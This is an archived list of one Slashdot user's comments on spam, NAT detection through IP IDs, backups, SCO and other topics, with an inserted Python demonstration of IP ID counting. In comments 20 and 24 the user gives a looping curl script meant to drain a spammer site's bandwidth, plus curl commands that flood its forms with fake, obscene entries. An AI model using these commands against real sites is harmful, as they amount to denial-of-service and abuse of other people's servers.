Slashdot Mirror


User: pr0ntab

pr0ntab's activity in the archive.

Stories: 0 · Comments: 571

Comments · 571

  1. Notes... on Will Bounties Cure The Spam Problem? · · Score: 4, Insightful

    If you read the article, it explains how techniques like using PGP to sign messages can make the From field unspoofable, but they are not relevant when privacy or anonymity is crucial (whistleblowing, etc.). Hence, it cannot be demanded that everyone follows this practice. It suggests recipients should check your email more carefully to see if it's legit (the article also explains this; checking your headers for a "postmark" that looks abnormal).

    The last quote was somewhat encouraging, that "the Internet is a rough and tumble place" (paraphrasing) but we'll cope because it is often the best way to reach people.

    If an unspoofable From: is what you want, demand your mail server administrator only accept signed messages, or filter them yourself in your client.
    Another option is to convince her (and/or the administrators of any other MXs you care about) to relay with SMTP AUTH only. Most mail clients support that feature nowadays. If enough people start using that new RFC, we shouldn't have to worry about hijacked ISPs' mail servers being used to send spam, and their netblocks being RBL'd.

  2. $458 dollar gloves on Phone Companies Bill Public for Nonexistent Equipment · · Score: 4, Funny

    0 line printers - $25,000
    1 phone switch - $133,000
    The same phone switch on newegg - $4

    Succeeding to sweep a damning audit of your shady accounting under the rug: Priceless

    There are some things money can't buy. You use back-office deals with the FCC for that.

  3. Re:Why are Opteron's out of reach? vs Athlon64? on Slashback: Vaidhyanathan, Oregon, Opteron · · Score: 1

    1) You're helping them pay off their development costs because you absolutely need the 64-bit stuff RIGHT NOW. I for one am involved in getting a few such systems, and it's like pulling teeth from the vendors getting them out the door (the demand is pretty high, so I guess AMD sized up their market about right).

    2) The difference between the Athlon MP and the XP is also that the MP has been tested to run MP without screwing up (cache timings, etc.). AFAIK you get a better warranty too.

  4. Uhh... still doesn't matter. on Hard Drives Instead of Tapes? · · Score: 1

    The real problem is that tapes lag behind hard disks in terms of storage capacity vs. cost. There isn't even much of a weight/size advantage with large tapes (DLT IV, AIT-3). Since 80GB drives can be had for less than $100, that would take 2 DLT tapes at $45 each. You save a few bucks on the tape, but you have more tapes that take up more room. Plus, hard disks have the extra benefit of being tons faster and seekable.

    Now your argument about hard disk capacities increasing doesn't hold water. You will need more tapes to back up bigger data storage arrays anyway, so by that logic, you could buy still more cheap hard drives. The sweet spot in cost between tapes and the hard disks won't change.
    So you just size up your "real" storage, then buy extra, cheap hard drives in sufficient quantity to mirror it at intervals.
    I think the real issue why no one does this is because it seems counterintuitive; it's not a common practice. Every time I want to configure some massive, but cheap volume to store project data, I always get stopped by my boss with "well how are we going to back this up?". The tape technology isn't there (for the right price). But if we spent the money we spend on tape drives and tapes to fund a hard-disk based solution, I wouldn't worry about how we would back those massive volumes up. I could probably buy a whole pallet of hard disks for the entire project, and allocate X for the actual storage, and have Y slated for incrementals, and Z for archives and hot spares. Plus we could move hard disks in and out of the data volume and into the backup pool (or vice-versa) as our needs dictate.

    What's nice about the hard disks is that they will be in storage, in parked mode most of the time so you shouldn't have to worry about them failing even if the warranty is shoddy. And it's got built-in electronics, so you don't have to worry about a tape drive/robot going on the fritz.

  5. And you've got the IP ids covered... on More On Detecting NAT Gateways · · Score: 1

    since by default they're randomized in Linux 2.4.x. Hooooooray!

  6. Re:It's not as easy as fixing NAT's TTL on More On Detecting NAT Gateways · · Score: 1

    Okay, I got confused between TCP sequence numbers and IP ids. But with TCP sequence numbers, you send both the current and the NEXT one to the other side. So they can be anything. However, that wasn't what the study was looking at...
    They were using IP ids. Apparently, most IP stacks just increment a counter for each packet they send out. However, IP ids need not increment; they are assigned to a packet, and if it fragments it can reassemble it by finding the "closest" packets with the same id and destination. A router can do whatever it wants in this field so it can make sure the datagram gets through uncorrupted. If the OS happens to be using an incrementing scheme for each new IP packet, this can still be fixed with a properly configured NAT/firewall to randomly assign them so that this method can't be used against it. This practice would nullify the ability to detect multiple streams incrementing from different starting points.

    In fact, *BSD already implements a fix for this; it's the RANDOM_IP_ID option in the kernel. Also, Linux has had this since 2.4.0 by default (secure_ip_id); there is one catch, it depletes your entropy pool so if you don't have a good entropy source eventually it'll send all zeros! :-) Let's see the ISP try to figure that one out.

  7. Amen to that brother. on Cable Beats DSL For Average Speed · · Score: 1

    I live near Dulles. It's either Cox residential, or ISDN. Cox QOS is so bad I call them up just to harass them now, because I know nothing will ever get fixed. Meanwhile, there's no DSL to be found. Furthermore, Cox won't offer "Business class" service here, which is stupid because the area is so flush with cash and techies and I would kill to get better QOS on cable.

    In short: richest county in middle atlantic has no decent broadband. Something is seriously wrong in the county seat of AOL.

  8. Re:It's not as easy as fixing NAT's TTL on More On Detecting NAT Gateways · · Score: 1

    As I understand it, the problem comes where you have several computers, all generating their own sequence numbers. Especially if you have a mix of OSes, it will be obvious that there are multiple connections with different sequences

    The method requires the OS to use a simple set and increment method (ala Windows 98 and old MacOS) with which it can identify multiple linear progressions (and thus multiple machines). However, if each machine uses a random number for every packet (like the ones I mentioned), you can't separate one from the other since it all looks like noise.

    Of course, it doesn't prevent them from looking for stuff as you mentioned; Mac Updater + WinXP updater plus RedCarpet = weird fishiness. However, this assumes they have a very large clue. I think most would assume a cluster of Windows boxes. And even this could be detected if Windows update transmits a GUID as part of the connection process; this could be detected and used as evidence for NAT if the ISP sees a lot of different ones.
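
The counting method that comments 6 and 8 describe (several linear IP ID progressions visible behind one address, and nothing to separate once the IDs look like noise), as an added example that is not part of the original comments. The function names, the `max_gap` and `min_len` thresholds and both ID streams are constructed for illustration.

```python
from typing import List

ID_SPACE = 1 << 16  # the IPv4 Identification field is 16 bits wide


def count_id_sequences(ip_ids: List[int], max_gap: int = 64, min_len: int = 5) -> int:
    """Group IP IDs (in arrival order) into incrementing runs; return how many
    runs are long enough to look like one host's packet counter."""
    tails: List[int] = []    # last ID placed in each run
    lengths: List[int] = []  # packets placed in each run
    for ipid in ip_ids:
        best, best_gap = None, max_gap + 1
        for i, tail in enumerate(tails):
            gap = (ipid - tail) % ID_SPACE  # forward distance, handles 65535 -> 0 wrap
            if 0 < gap < best_gap:
                best, best_gap = i, gap
        if best is None:
            tails.append(ipid)
            lengths.append(1)
        else:
            tails[best] = ipid
            lengths[best] += 1
    return sum(1 for n in lengths if n >= min_len)


def counter_host(start: int, step: int, n: int) -> List[int]:
    """Constructed sample: a stack that bumps one global counter per packet
    (step > 1 models packets sent to destinations the observer cannot see)."""
    return [(start + step * k) % ID_SPACE for k in range(n)]


def interleave(*streams: List[int]) -> List[int]:
    """Round-robin merge, as the streams would appear behind one NAT address."""
    return [ipid for group in zip(*streams) for ipid in group]


# Constructed capture 1: three counter-based hosts behind one public address.
COUNTER_HOSTS = interleave(counter_host(1000, 1, 40),
                           counter_host(30000, 2, 40),
                           counter_host(65500, 3, 40))  # this one wraps past 65535

# Constructed capture 2: same packet count, but IDs scattered over the whole
# 16-bit space (a fixed multiplicative scramble stands in for a stack that
# randomizes the field, so the result is reproducible).
SCATTERED_IDS = [(i * 40503) % ID_SPACE for i in range(120)]

if __name__ == "__main__":
    print("counter-based hosts seen:", count_id_sequences(COUNTER_HOSTS))
    print("scattered IDs, runs seen:", count_id_sequences(SCATTERED_IDS))
```

With the counter-based capture the grouping recovers three runs; with scattered IDs no run reaches `min_len`, so the observer has nothing to count.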

  9. Re:It's not as easy as fixing NAT's TTL on More On Detecting NAT Gateways · · Score: 3, Informative

    Well, if you use Win2k, XP, Mac OS X, Linux or Solaris, you're covered because the sequence numbers are already random, and thus you can't use the counting technique.
    And if you have old computers, you won't need to modify anything except for your firewall rules. If you have *BSD, you have the sequence number rewriter, which is also available on linux as the "ippersonality" extension to the iptables firewall. Both of these guys also support ttl mangling too (built-in).

    You have the power to make your network look like whatever you want. It's nice to have an ISP that's cool, but if you're unlucky, they'll never be the wiser. In a way, if you're going through such effort, you're probably helping them out somehow by wrangling your own network into some resemblance of order. ^_^

  10. (yup) on More On Detecting NAT Gateways · · Score: 1

    Also, linux (like *bsd) randomizes ipid's by default now. Have fun with NAT, without fear.

  11. And yet... on SCO Threatens Red Hat and SuSE · · Score: 2, Insightful

    Not one mention of how IBM has leaked any SCO IP into linux. Not one mention of how any IBM contributions might be SCO derived.
    Not one mention of how any particular part of linux is contributed directly (instead of jointly developed with) IBM.

    They successfully made PDF copies of the individual IP and Trademark transfers between parties (AT&T, IBM, SCO, etc.).
    Hurrah. Real informative.

  12. what aix code.... on SCO Threatens Red Hat and SuSE · · Score: 1

    you mean xfs? whoop-dee-doo. :-)

  13. Boycott, oh wait a minute... on Penny Arcade vs. American Greetings · · Score: 1

    I don't buy American Greetings cards... they suck anyway.

    Have you ever been to a Carlton Cards store? Christ those places are sentiment-shitholes.

    Every card is bland, or gooey, bl-ooey, or completely unfunny. Same thing with the ornaments during the holidays.
    Do yourself a favor and stick to Hallmark cards at CVS. They actually have permission to use Peanuts characters.

    Boycott, hahahaha.

  14. (mod up) on Opteron Benchmarked Against Xeon · · Score: 1

    This is entirely correct. The distribution of SuSE Linux and the applications used were designed to use the x86-64 bit mode, and get the full benefit of the new instruction set and large registers. If he was able to try some Windows benchmarks designed for x86-64, he might have gotten more favorable numbers. Alas, betas of these Microsoft products are nearly impossible to obtain, although they have been promised.

    Where the Opteron will shine is when people start doing things like testing OpenSSL using the new instruction set in the encryption core. I notice in the latest tarballs, there is x86-64 optimized bignum code, which is used elsewhere to implement various parts of the crypto library. I am eager to see the numbers on that.

  15. Solaris does this... not sure about linux. on Conquest FS: "The Disk Is Dead" · · Score: 1

    Solaris is very finicky about ever writing out the pages in working RAM into swap. In particular, it fills free RAM with cached inodes, directories, and small files until the free memory ceiling hits a watermark, then it merely starts running the page reclaimer. The page reclaimer is the only way certain files and directories get written back to disk unless some option is turned on in the UFS layer, or the file is opened O_SYNC, AFAIK.

    I imagine linux does this too, I remember reading how the vfs layer and page buffer layer are tied at the hip, and the same sort of thing happens.

  16. I know on DARPA Grant Cancelled for OpenBSD and U-Penn? · · Score: 1

    Not 3 months ago they just up and canceled a project a good friend of mine was working on without warning. This was right after he gave a presentation on his latest successful efforts that seemed to impress the sponsors.

    Needless to say, he was pissed as all get out.

    Apparently this happens a lot... especially in research for information technology.

  17. Why is this modded up? on Poincaré Conjecture May Be Solved · · Score: 1

    I mean seriously, it's not like this guy is starting a book tour or series of $200 seminars or anything. He's presenting his proof to the community so that it can be studied and discussed; that's what this is about.

    So what the hell are you talking about... was it supposed to be tongue-in-cheek humor?

  18. Which TIs have you even played with? on HP Calcs Live On Under PalmOS · · Score: 2, Interesting

    I don't think you've been properly introduced to the better of the TI calcs... I've got 'em both:

    A TI-83 which is overclocked... (!) Still works like a charm after having its guts ripped out repeatedly. Now, I didn't drop it in a lake, but it's been in the shower... so... hehe

    And then, the workhorse, my beloved TI-89. Let me just say to all the HP holier-than-thou people out there: AOS ownz.
    So it doesn't have RPN (but I remember seeing a few packages on ticalc.org)... but it does everything else. I mean jesus, it's a frickin' 68010.

    I get real work done with it too... my main folder has about a hundred functions and programs sittin around; I forget what half of them do. ;P

  19. Note to anyone who didn't read the article: on Rare Nuclear Fusion Detected · · Score: 5, Informative

    It has nothing to do with alternative types of fusion to create energy. Rather, they found experimental evidence that backs up some of the theories in particle physics (the relationship between protons and their slightly heavier cousins the neutrons).

    It may seem like a so-what type moment, but apparently they were getting five of these events a day, with dozens of recorded events. So scientists will have a lot of new experimental evidence to chew on, and maybe there will be some refinement in various theories or models used in quantum chromodynamics (study of quarks, basically).
    Then, I could be wrong... Anyone who follows this stuff know of any other more significant studies that regularly contribute evidence to those working in q.c.d?

  20. Re:Indeed nice on Fighting the Hydra -- A Spam Warrior's Tale · · Score: 1

    curl http://national-directories.com/_vti_bin/shtml.exe /S2-usmrg.htm -F "VTI-GROUP=0" -F "ProductOrService=INFOSOURCE United States Media Relations Guide" -F "SendServiceLiterature=yes" -F "Name=DICKWEED JOHNSON" -F "Title=ASSMASTER (M.S.)" -F "Company=Big Schlongs LLC" -F "Address=666 Hades Valley Dr.^J" -F "Email=president@bschlongs.net" -F "Phone=414 568 7114" have fun!

  21. My apologies kind sir. on LCD Screens Double as Speakers · · Score: 1

    Clearly, it's the mods on crack, today and everyday. That's _real_ synesthesia. (oooh pretty words make me hear stereo, MOD UP INSIGHTFUL!!!!! FOR GREAT JUSTICE)

  22. WTF are you talking about? on LCD Screens Double as Speakers · · Score: 3, Informative

    How did this get modded Interesting?

    If you go to the FAQ on NXT's website, you'll discover they use superposition principles to produce virtual channels in the sweet spot. They can do two; supposedly three (L, R + center) is possible.

    Watermark, joint-stereo, give me a fucking break. Add nonsense buzzwords to a post and get modded up! A 2-step plan for slashdot success. (Unless you meant to be funny... in which case a big YOU ARE TEH 1Di07s!!! to the mods active today)

  23. The answer is... it doesn't. on LCD Screens Double as Speakers · · Score: 5, Interesting

    NXT argues its technology has major advantages over conventional speakers. It says its SoundVU technology distributes frequencies evenly across a room, producing what audio buffs call a universal "sweet spot".

    I read that as it's a speaker that fills the room with a single channel of sound. If it was in stereo, then it wouldn't be room filling if you could discern the channels. You could probably deal with it if the screen created two virtual speakers by superposition using exciters on opposite sides of the monitor. But then the sweet spot would be very small, aimed at the person sitting a few feet away. Definitely not room filling.

    Plus, they go on to say how they intend to use it in mobile phones and PDAs. All single channel devices when used without headphones.

  24. Here's a nice one... on Fighting the Hydra -- A Spam Warrior's Tale · · Score: 2, Interesting

    Make sure you have curl and usleep.

    First, try to convince the server to give you a listing of /images/ and/or the web root with like the /?A=D trick. /icons/ is also useful. Save this somewhere.
    Then, turn it into a big list of URLs for pages and images, say "url_file_you_made". Finally, write a shell script to use that for nefarious purposes, like this:
    end = $(($(date +%s) + 3600)) # 1 hour from now
    while [ $(date +%s) -lt $end ]; do
    for each in $(cat url_file_you_made); do
    curl -e "SPAM_EQUALS_I_POISON_YOUR_REFERAL_LOGS" \
    -A "libcurl in da hizzouse" \
    -m 1 -o /dev/null ${each} &
    usleep 500000
    done
    done
    That one really can suck down some bandwidth, especially if you tweak the usleep. In this case, each download is forked off and lasts for at most 1 second, so with usleep at .5 seconds you get on average two downloads from the list going at once. But if you decrease it to 250000, then you can have 4, etc. So this will hit all the docs on the site for an hour and waste their bandwidth (the logic being that those cheap webhosting providers hit the spammer with a huge penalty if they go over a transfer limit, but your downstream bandwidth from your ISP is cheap.)

    Also if the form is POST, you can use good ol' curl again like this to poison it:
    curl http://suckymlmsite.com/formmail.php -F "name=Dickhead" -F "address=Sucking my cock"
    note it isn't URL encoded. That's multipart. You can do URL encoded POST with
    -d "name=dickweed&address=Your%20Mom"

  25. They come in cartridges on Plasmon Exhibits Working Blue Laser DVD Drive · · Score: 1

    Like zip disks, floppies, and mini-disc. Hence, you protect it from grubby fingers.